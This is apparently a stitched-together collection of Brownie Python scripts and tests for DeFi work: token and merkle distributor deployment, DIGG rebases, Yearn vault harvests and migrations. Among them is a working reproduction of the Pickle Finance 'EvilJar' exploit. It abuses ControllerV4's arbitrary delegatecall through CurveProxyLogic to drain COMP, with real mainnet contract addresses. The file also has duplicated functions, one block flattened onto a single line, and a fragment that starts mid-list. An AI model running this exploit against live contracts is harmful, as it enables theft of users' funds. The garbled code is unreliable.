def deploy():
    """Deploy a MerkleDistributor for the DAI snapshot tree.

    Uses the first unlocked account on a forked/development chain; otherwise
    prompts for a locally stored brownie account.
    """
    user = accounts[0] if rpc.is_active() else accounts.load(input('account: '))
    # Context manager so the snapshot file handle is closed promptly
    # (the original `json.load(open(...))` left it to the GC).
    with open('snapshot/07-merkle-distribution.json') as fp:
        tree = json.load(fp)
    root = tree['merkleRoot']
    token = str(DAI)
    MerkleDistributor.deploy(token, root, {'from': user})
def rebase(badger: BadgerSystem, account):
    """Trigger a DIGG rebase if the policy's timing conditions allow it.

    Logs supply/share state and AMM pair reserves before and after the
    rebase so the keeper run can be audited from the console output.
    """
    digg = badger.digg
    supplyBefore = digg.token.totalSupply()
    print("spfBefore", digg.token._sharesPerFragment())
    print("supplyBefore", digg.token.totalSupply())
    print(digg.cpiMedianOracle.getData.call())

    # DIGG/wBTC pairs on both AMMs, used purely for before/after logging.
    sushi = SushiswapSystem()
    pair = sushi.getPair(digg.token, registry.tokens.wbtc)
    uni = UniswapSystem()
    uniPair = uni.getPair(digg.token, registry.tokens.wbtc)

    # Timing state from the rebase policy contract.
    last_rebase_time = digg.uFragmentsPolicy.lastRebaseTimestampSec()
    min_rebase_time = digg.uFragmentsPolicy.minRebaseTimeIntervalSec()
    in_rebase_window = digg.uFragmentsPolicy.inRebaseWindow()
    now = chain.time()

    time_since_last_rebase = now - last_rebase_time
    min_time_passed = (last_rebase_time + min_rebase_time) < now
    console.print({
        "last_rebase_time": last_rebase_time,
        "in_rebase_window": in_rebase_window,
        "now": now,
        "time_since_last_rebase": time_since_last_rebase,
        "min_time_passed": min_time_passed,
    })

    # Rebase if sufficient time has passed since last rebase and we are in the window.
    # Give adequate time between TX attempts
    if time_since_last_rebase > hours(2) and in_rebase_window and min_time_passed:
        console.print("[bold yellow]===== 📈 Rebase! 📉=====[/bold yellow]")
        print("pair before", pair.getReserves())
        print("uniPair before", uniPair.getReserves())
        tx_timer.start_timer(account, "Rebase")
        tx = digg.orchestrator.rebase({"from": account})
        tx_timer.end_timer()
        # NOTE(review): nesting below was reconstructed from a flattened
        # source; the diagnostics are grouped under the local-fork branch
        # since call_trace() requires a debug-capable (dev/fork) node —
        # confirm against the original script.
        if rpc.is_active():
            chain.mine()
            print(tx.call_trace())
            print(tx.events)
            supplyAfter = digg.token.totalSupply()
            print("spfAfter", digg.token._sharesPerFragment())
            print("supplyAfter", supplyAfter)
            print("supplyChange", supplyAfter / supplyBefore)
            print("supplyChangeOtherWay", supplyBefore / supplyAfter)
            print("pair after", pair.getReserves())
            print("uniPair after", uniPair.getReserves())
    else:
        console.print("[white]===== No Rebase =====[/white]")
def get_user():
    """Return the transaction-sending account.

    On a forked/local chain a known address is impersonated; otherwise the
    stored brownie account names are listed and one is loaded by prompt.
    """
    if not rpc.is_active():
        print("Available accounts:", accounts.load())
        return accounts.load(input("account: "))
    return accounts.at("0x1A6224b5ADe2C6d52d75F5d8b82197bbc61007ee", force=True)
def get_user():
    """Return the account to send transactions from.

    Impersonates a fixed address when running against a local fork;
    otherwise lists stored brownie accounts and prompts for one.
    """
    if not rpc.is_active():
        print("Available accounts:", accounts.load())
        return accounts.load(input("account: "))
    return accounts.at("0x751B640E0AbE005548286B5e15353Edc996DE1cb", force=True)
def get_user():
    """Return the sending account.

    Impersonates a fixed address on a local fork; otherwise prompts with a
    choice list built from the locally stored brownie accounts.
    """
    if rpc.is_active():
        return accounts.at("0x5E38b802525de11A54506801B296D2Aa93d033EF", force=True)
    choice = click.prompt("Account", type=click.Choice(accounts.load()))
    return accounts.load(choice)
def test_disconnect():
    """Disconnecting tears everything down; a second disconnect raises."""
    network.disconnect()
    assert network.show_active() is None
    for still_up in (network.is_connected(), rpc.is_active(), web3.isConnected()):
        assert not still_up
    with pytest.raises(ConnectionError):
        network.disconnect()
def main():
    """Deploy Pytho and a MerkleDistributor, then fund the distributor.

    The entire minted supply is transferred to the distributor so snapshot
    participants can claim against the merkle root.
    """
    # Context manager closes the snapshot file (original leaked the handle).
    with open("snapshot/02-merkle.json") as fp:
        tree = json.load(fp)
    user = accounts[0] if rpc.is_active() else accounts.load(input("account: "))
    pytho = Pytho.deploy("Pytho", "PYTHO", tree["tokenTotal"], {"from": user})
    distributor = MerkleDistributor.deploy(pytho, tree["merkleRoot"], {"from": user})
    pytho.transfer(distributor, pytho.balanceOf(user))
def main():
    """Deploy the PercentIOU token and its MerkleDistributor, then fund it.

    The deployer's full balance is moved into the distributor for claiming.
    """
    # Context manager closes the snapshot file (original leaked the handle).
    with open("snapshot/02-merkle.json") as fp:
        tree = json.load(fp)
    user = accounts[0] if rpc.is_active() else accounts.load(input("account: "))
    root = tree["merkleRoot"]
    percentIOU = PercentIOU.deploy(
        "Percent IOU", "PIOU", tree["tokenTotal"], {"from": user}
    )
    distributor = MerkleDistributor.deploy(percentIOU, root, {"from": user})
    percentIOU.transfer(distributor, percentIOU.balanceOf(user))
def main():
    """Deploy the Cornichon token and its MerkleDistributor, then fund it.

    The deployer's full balance is moved into the distributor for claiming.
    """
    # Context manager closes the snapshot file (original leaked the handle).
    with open("snapshot/04-merkle.json") as fp:
        tree = json.load(fp)
    user = accounts[0] if rpc.is_active() else accounts.load(input("account: "))
    root = tree["merkleRoot"]
    cornichon = Cornichon.deploy(
        "Cornichon", "CORN", tree["tokenTotal"], {"from": user}
    )
    distributor = MerkleDistributor.deploy(cornichon, root, {"from": user})
    cornichon.transfer(distributor, cornichon.balanceOf(user))
def harvest():
    """Harvest every registered vault's strategy, impersonating andre.

    Only runs on a forked chain (impersonation via ``force=True``).
    Vaults whose strategy lacks a harvest interface are skipped.
    """
    assert rpc.is_active()
    andre = accounts.at("andrecronje.eth", force=True)
    print(andre)
    governance = web3.ens.resolve("ychad.eth")
    registry = load_registry()
    for vault in load_vaults(registry):
        secho(vault.name, fg="green")
        print(vault)
        try:
            vault.strategy.harvest({"from": andre}).info()
        except AttributeError:
            # Best-effort: skip vaults without a harvestable strategy.
            pass
def migrate():
    """Migrate the vault to a freshly deployed StrategyBalancerLP.

    Prints share price and strategy asset estimates before the migration,
    after it, and after each of two keeper harvests. Fork-only.
    """
    assert rpc.is_active()
    vault = Vault.at(get_address("vault"))
    gov = accounts.at(vault.governance(), force=True)
    old_strategy = StrategyBalancerLP.at(get_address("old strategy"))
    new_strategy = StrategyBalancerLP.deploy(vault, {"from": gov})

    def report(strategy):
        # Snapshot vault share price and the strategy's asset estimate.
        print("pricePerShare", vault.pricePerShare().to("ether"))
        print("estimatedTotalAssets", strategy.estimatedTotalAssets().to("ether"))

    report(old_strategy)
    vault.migrateStrategy(old_strategy, new_strategy, {"from": gov})
    report(new_strategy)
    keeper = accounts.at(new_strategy.keeper(), force=True)
    for _ in range(2):
        new_strategy.harvest({"from": keeper})
        report(new_strategy)
def migrate():
    """Migrate the vault to a new StrategyUniswapPairPickle deployment.

    The replacement reuses the old strategy's jar and pool id. Share price
    and asset estimates are logged around the migration and two harvests.
    Fork-only.
    """
    assert rpc.is_active()
    vault = Vault.at(get_address('vault'))
    gov = accounts.at(vault.governance(), force=True)
    old_strategy = StrategyUniswapPairPickle.at(get_address('old strategy'))
    new_strategy = StrategyUniswapPairPickle.deploy(
        vault, old_strategy.jar(), old_strategy.pid(), {'from': gov}
    )

    def snapshot(strategy):
        # Log vault share price alongside the strategy's asset estimate.
        print('pricePerShare', vault.pricePerShare().to('ether'))
        print('estimatedTotalAssets', strategy.estimatedTotalAssets().to('ether'))

    snapshot(old_strategy)
    vault.migrateStrategy(old_strategy, new_strategy, {'from': gov})
    snapshot(new_strategy)
    keeper = accounts.at(new_strategy.keeper(), force=True)
    for _ in range(2):
        new_strategy.harvest({'from': keeper})
        snapshot(new_strategy)
def main():
    """Recycle the user's stablecoins and y3CRV via the Recycle contract.

    Shows nonzero balances, asks for confirmation, grants allowances where
    needed, then calls ``recycle()`` and reports the received y3CRV.
    """
    user = (
        accounts[-1] if rpc.is_active() else accounts.load(input("brownie account: "))
    )
    recycle = Recycle.at("0x3f1C19b09b474f7b7a8B09488Fc8648b278930cc")
    dai = interface.ERC20("0x6B175474E89094C44Da98b954EedeAC495271d0F")
    usdc = interface.ERC20("0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48")
    usdt = interface.USDT("0xdAC17F958D2ee523a2206206994597C13D831ec7")
    token3crv = interface.ERC20("0x6c3F90f043a72FA612cbac8115EE7e52BDe6E490")
    y3crv = interface.ERC20("0x9cA85572E6A3EbF24dEDd195623F188735A5179f")
    coins = [dai, usdc, usdt, y3crv]
    symbols = {token3crv: "3CRV", y3crv: "y3CRV"}
    balances = {
        symbols.get(coin, coin.symbol()): coin.balanceOf(user) / 10 ** coin.decimals()
        for coin in coins
    }
    # Only display coins the user actually holds.
    balances = {name: balance for name, balance in balances.items() if balance > 0}
    # Plain string literal; original used an f-string with no placeholders (F541).
    print("Recycling...")
    for coin, balance in balances.items():
        print(f" {coin} = {balance}")
    if not click.confirm("Continue?"):
        return
    for coin in coins:
        # Grant unlimited allowance only when the current one is insufficient.
        if coin.balanceOf(user) > coin.allowance(user, recycle):
            print(f"Approving {coin.name()}")
            coin.approve(recycle, 2 ** 256 - 1, {"from": user})
    tx = recycle.recycle({"from": user})
    print(
        "Got", tx.events["Recycled"]["received_y3crv"] / 10 ** y3crv.decimals(), "y3CRV"
    )
def main():
    """Poke keeper.earn on every vault with enough idle funds to deploy.

    Builds a table of per-vault availability, prints it, and submits a
    single earn() transaction covering all eligible vaults.
    """
    if rpc.is_active():
        sender = accounts[0]
    else:
        priv = os.environ.get('VAULT_KEEPER_PRIV')
        sender = accounts.add(priv) if priv else accounts.load(input('brownie account: '))

    table, vaults = [], []
    for data in vault_data:
        if data['name'] in skipped:
            print('aLINK not supported yet')
            continue
        token = interface.ERC20(data['erc20address'])
        vault = interface.YearnVault(data['vaultContractAddress'])
        decimals = token.decimals()
        available = vault.available()
        balance = vault.balance()
        # A vault can earn when its idle fraction exceeds 1 - min/max.
        ratio = 1 - vault.min() / vault.max()
        can_earn = available / balance > ratio if balance > 0 else False
        if can_earn:
            vaults.append(data['vaultContractAddress'])
        table.append(
            [data['name'], available / 10 ** decimals, balance / 10 ** decimals, can_earn]
        )

    print(tabulate(table, headers=['name', 'available', 'balance', 'can_earn']))
    if not vaults:
        print('no vaults to poke, exiting')
        return
    print('poking these vaults:', vaults)
    keeper.earn(vaults, {'from': sender, 'gas_limit': 2_500_000})
def main():
    """Reproduce the Pickle EvilJar exploit against ControllerV4 on a fork.

    Deploys attacker contracts, then abuses swapExactJarForJar's arbitrary
    delegatecall targets to drain COMP via CurveProxyLogic. Fork-only.
    """
    assert rpc.is_active()
    hacker = accounts[0]
    controller = interface.ControllerV4(
        "0x6847259b2B3A4c17e7c43C54409810aF48bA5210")
    dai = interface.ERC20("0x6B175474E89094C44Da98b954EedeAC495271d0F")
    cdai = interface.ERC20("0x5d3a536E4D6DbD6114cc1Ead35777bAB948E3643")
    comp = interface.ERC20("0xc00e94Cb662C3520282E6f5717214004A7f26888")
    curve_proxy_logic = interface.CurveProxyLogic(
        "0x6186E99D9CFb05E1Fdf1b442178806E81da21dD8")
    # Jar and strategy for DAI, resolved from the live controller.
    jar = interface.PickleJar(controller.jars(dai))
    strategy = interface.Strategy(controller.strategies(dai))
    print("jar", jar)
    print("strategy", strategy)
    # Token being stolen and the attacker's fake jar/underlying contracts.
    steal = comp
    evil_jar = EvilJar.deploy(steal, {"from": hacker})
    fake_underlying = FakeUnderlying.deploy(steal, {"from": hacker})
    contracts = {
        "controller": controller,
        "strategy": strategy,
        "dai jar": jar,
        "evil jar": evil_jar,
        "fake underlying": fake_underlying,
        "hacker": hacker,
    }

    def status():
        # Tabulate dai/cdai/comp balances of every tracked contract.
        data = []
        for name, c in contracts.items():
            data.append([
                name,
                dai.balanceOf(c).to("ether"),
                cdai.balanceOf(c) / 1e8,
                comp.balanceOf(c) / 1e18,
            ])
        print(tabulate(data, headers=["contract", "dai", "cdai", "comp"]))

    status()

    def arbitrary_call(to, sig, param=None):
        # Encode a CurveProxyLogic.add_liquidity payload that, when
        # delegatecalled by the controller, invokes the 4-byte selector
        # `sig[:10]` on `to`.
        # NOTE(review): `param` acts only as a flag — any non-None value
        # selects fake_underlying, otherwise the stolen token is passed;
        # confirm this is intentional.
        param = steal if param is None else fake_underlying
        return curve_proxy_logic.add_liquidity.encode_input(
            to,
            sig[:10],
            1,
            0,
            param,
        )

    # withdrawAll, then `earns` rounds of jar.earn, then a final withdraw
    # of the stolen token routed to the fake underlying.
    earns = 3
    datas = ([arbitrary_call(strategy, strategy.withdrawAll.encode_input())] +
             [arbitrary_call(jar, jar.earn.encode_input())] * earns + [
                 arbitrary_call(
                     strategy, strategy.withdraw["address"].encode_input(steal), True)
             ])
    targets = [curve_proxy_logic for _ in datas]
    tx = controller.swapExactJarForJar(
        evil_jar,
        evil_jar,
        0,
        0,
        targets,
        datas,
        {"from": hacker},
    )
    status()
def test_connect():
    """Connecting brings up the default development network."""
    network.connect()
    assert network.show_active() == "development"
    for is_up in (network.is_connected(), rpc.is_active(), web3.isConnected()):
        assert is_up
def is_forknet(self):
    """Return whether a local RPC process is attached (i.e. running on a fork/dev chain)."""
    return rpc.is_active()
def main(): """ Connect to badger system, and configure multisig for running transactions in local fork without access to accounts """ # Connect badger system from file badger = connect_badger() digg = badger.digg # Sanity check file addresses expectedMultisig = "0xB65cef03b9B89f99517643226d76e286ee999e77" assert badger.devMultisig == expectedMultisig if rpc.is_active(): distribute_test_ether(badger.devMultisig, Wei("5 ether")) # Multisig wrapper # Get price data from sushiswap, uniswap, and coingecko digg_usd_coingecko = 41531.72 btc_usd_coingecko = 32601.13 digg_per_btc = digg_usd_coingecko / btc_usd_coingecko uniTWAP = get_average_daily_price("scripts/oracle/data/uni_digg_hour") sushiTWAP = get_average_daily_price("scripts/oracle/data/sushi_digg_hour") averageTWAP = Average([uniTWAP, sushiTWAP]) console.print({ "uniTWAP": uniTWAP, "sushiTWAP": sushiTWAP, "averageTWAP": averageTWAP }) supplyBefore = digg.token.totalSupply() print("spfBefore", digg.token._sharesPerFragment()) print("supplyBefore", digg.token.totalSupply()) marketValue = Wei(str(averageTWAP) + " ether") print(marketValue) print(int(marketValue * 10**18)) print("digg_per_btc", digg_per_btc, averageTWAP, marketValue) if rpc.is_active(): distribute_test_ether(digg.centralizedOracle, Wei("5 ether")) centralizedMulti = GnosisSafe(digg.centralizedOracle) print(digg.marketMedianOracle.providerReports(digg.centralizedOracle, 0)) print(digg.marketMedianOracle.providerReports(digg.centralizedOracle, 1)) print(digg.cpiMedianOracle.providerReports(digg.constantOracle, 0)) print(digg.cpiMedianOracle.providerReports(digg.constantOracle, 1)) print(digg.cpiMedianOracle.getData.call()) sushi = SushiswapSystem() pair = sushi.getPair(digg.token, registry.tokens.wbtc) uni = UniswapSystem() uniPair = uni.getPair(digg.token, registry.tokens.wbtc) print("pair before", pair.getReserves()) print("uniPair before", uniPair.getReserves()) tx = centralizedMulti.execute( MultisigTxMetadata(description="Set Market Data"), { 
"to": digg.marketMedianOracle.address, "data": digg.marketMedianOracle.pushReport.encode_input(marketValue), }, ) chain.mine() print(tx.call_trace()) print(tx.events) chain.sleep(hours(0.4)) chain.mine() in_rebase_window = digg.uFragmentsPolicy.inRebaseWindow() while not in_rebase_window: print("Not in rebase window...") chain.sleep(hours(0.1)) chain.mine() in_rebase_window = digg.uFragmentsPolicy.inRebaseWindow() tx = digg.orchestrator.rebase({"from": accounts[0]}) chain.mine() supplyAfter = digg.token.totalSupply() print("spfAfter", digg.token._sharesPerFragment()) print("supplyAfter", supplyAfter) print("supplyChange", supplyAfter / supplyBefore) print("supplyChangeOtherWay", supplyBefore / supplyAfter) print("pair after", pair.getReserves()) print("uniPair after", uniPair.getReserves())
def test_attach(no_rpc):
    """rpc.attach accepts both a URL string and a (host, port) tuple."""
    for target in ("http://127.0.0.1:31337", ("127.0.0.1", 31337)):
        rpc._rpc = None
        rpc.attach(target)
    assert rpc.is_active()
{ # Advisors with unknown addresses "admin": "0x39415255619783A2E71fcF7d8f708A951d92e1b6", # Curve "amount": 14_016820183895092715910255, }, { # Rest of employee coins "admin": "0x39415255619783A2E71fcF7d8f708A951d92e1b6", # Curve "amount": 26_666666666046511627906979, }, { # Community fund "admin": "0x000000000000000000000000000000000000dead", # set to DAO XXX "amount": 151_515151511627906976744186, }, ] def get_live_admin(): # Admin and funding admin account objects used for in a live environment # May be created via accounts.load(name) or accounts.add(privkey) # https://eth-brownie.readthedocs.io/en/stable/account-management.html admin = None # funding_admins = [None, None, None, None] return admin, funding_admins if not rpc.is_active(): # logic that only executes in a live environment web3.eth.setGasPriceStrategy(gas_strategy) web3.middleware_onion.add(middleware.time_based_cache_middleware) web3.middleware_onion.add(middleware.latest_block_based_cache_middleware) web3.middleware_onion.add(middleware.simple_cache_middleware)
def test_launch(no_rpc):
    """Launching ganache makes the RPC active and owned as a child process."""
    assert not (rpc.is_active() or rpc.is_child())
    rpc.launch("ganache-cli")
    assert rpc.is_active() and rpc.is_child()